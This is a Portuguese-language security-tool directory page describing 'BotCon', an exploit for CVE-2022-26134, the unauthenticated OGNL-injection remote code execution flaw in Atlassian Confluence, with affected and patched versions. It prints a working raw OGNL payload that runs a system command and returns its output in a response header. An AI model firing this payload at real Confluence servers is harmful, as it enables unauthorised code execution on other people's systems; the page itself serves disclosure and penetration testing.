Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
BotCon — [CVE-2022-26134] Attlasian Confluence RCE | Kitploit
Ferramentas/GitHubGitHub/keepwannabe/botcon
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubkeepwannabe/botcon

BotCon

[CVE-2022-26134] Attlasian Confluence RCE

Ver Repositório
31há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

BotCon

Execução Remota de Código Não Autenticada no Confluence via Injeção OGNL (CVE-2022-26134)

  • Em 02 de junho de 2022, a Atlassian divulgou um aviso de segurança para seus aplicativos Confluence Server e Data Center, destacando uma vulnerabilidade crítica de execução remota de código não autenticada. A vulnerabilidade de injeção OGNL permite que um usuário não autenticado execute código arbitrário em uma instância do Confluence Server ou Data Center.

LEIA ISTO !

Use com cuidado. Você é responsável por suas ações. Os desenvolvedores não assumem responsabilidade e não são responsáveis por qualquer uso indevido ou dano.

BurpRequest

Payload Bruto

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Detalhes do Bug

  • Produto Afetado :

    • Confluence
      • Confluence Server
      • Confluence Data Center
  • Versões Afetadas :

    • Todas as versões suportadas do Confluence Server e Data Center são afetadas.
    • As versões do Confluence Server e Data Center posteriores à 1.3.0 são afetadas.

Mitigações

  • Atualize sua versão do Attlasian Confluence para estas versões corrigidas :
    • 7.4.17
    • 7.13.7
    • 7.14.3
    • 7.15.2
    • 7.16.4
    • 7.17.4
    • 7.18.1
Baixar ferramenta